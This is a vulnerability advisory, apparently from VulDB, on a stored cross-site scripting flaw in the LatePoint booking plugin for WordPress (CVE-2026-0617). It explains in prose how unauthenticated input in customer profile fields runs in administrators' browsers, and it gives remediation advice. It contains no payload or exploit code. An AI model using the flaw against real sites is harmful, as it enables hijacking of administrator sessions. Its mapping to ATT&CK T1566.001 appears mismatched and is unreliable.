CVE-2026-0617 in LatePoint Plugin
Summary
by MITRE • 02/03/2026
The LatePoint – Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the customer profile fields in all versions up to, and including, 5.2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator views the customer's activity history.
VulDB is the best source for vulnerability data and more expert information about this specific topic.
Analysis
by VulDB Data Team • 02/03/2026
The CVE-2026-0617 vulnerability affects the LatePoint plugin for WordPress, specifically targeting versions up to and including 5.2.5. This plugin facilitates appointment and event calendar booking functionality for WordPress websites, making it a critical component for businesses and organizations managing online scheduling systems. The vulnerability resides in the customer profile fields implementation, where the plugin fails to properly sanitize user input before storing it in the database. This flaw creates a persistent security weakness that allows attackers to inject malicious scripts into the customer data fields, which then get executed whenever administrators view the customer activity history. The vulnerability is classified as stored cross-site scripting because the malicious code is permanently stored on the server and executed each time the affected page is loaded, rather than being reflected in a single request.
The technical exploitation of this vulnerability occurs through the customer profile management interface where users can input personal information such as names, email addresses, phone numbers, and other contact details. When an attacker crafts malicious input containing javascript code within these fields, the plugin does not adequately sanitize or escape the data before it is stored. This insufficient input sanitization directly violates security best practices and creates a pathway for persistent malicious code execution. The vulnerability is particularly dangerous because it does not require authentication to exploit, meaning any user with access to the customer profile input fields can potentially inject malicious scripts. The stored data is then displayed in administrator views of customer activity history, providing the perfect execution environment for the injected scripts.
The operational impact of CVE-2026-0617 extends beyond simple script execution, as it can enable attackers to perform various malicious activities including credential theft, session hijacking, and data exfiltration. When administrators view customer profiles, their browsers execute the stored malicious scripts in the context of their authenticated sessions, potentially allowing attackers to steal administrative credentials or escalate privileges. The vulnerability affects the core functionality of the plugin's customer management system, which is essential for businesses relying on appointment scheduling services. This creates a significant risk for organizations handling sensitive customer data, as the malicious scripts could be used to capture login information, redirect users to phishing sites, or perform other harmful actions. The attack vector is particularly concerning because it targets the administrative interface where sensitive information is processed, making it a prime target for attackers seeking to compromise entire WordPress installations.
Organizations should immediately update to the latest version of the LatePoint plugin where this vulnerability has been patched, as the fix typically involves implementing proper input sanitization and output escaping mechanisms. The vulnerability aligns with CWE-79, which describes cross-site scripting flaws due to insufficient input validation and output escaping, and can be mapped to ATT&CK technique T1566.001 for initial access through malicious web content. Security measures should include implementing proper content security policies, conducting regular security audits of plugin installations, and monitoring for unusual activity in customer profile fields. Additionally, organizations should consider implementing network monitoring to detect potential exploitation attempts and establish incident response procedures for handling such vulnerabilities. The remediation process should also involve reviewing all customer data that may have been compromised and implementing multi-factor authentication for administrative accounts to mitigate potential damage from successful exploitation attempts.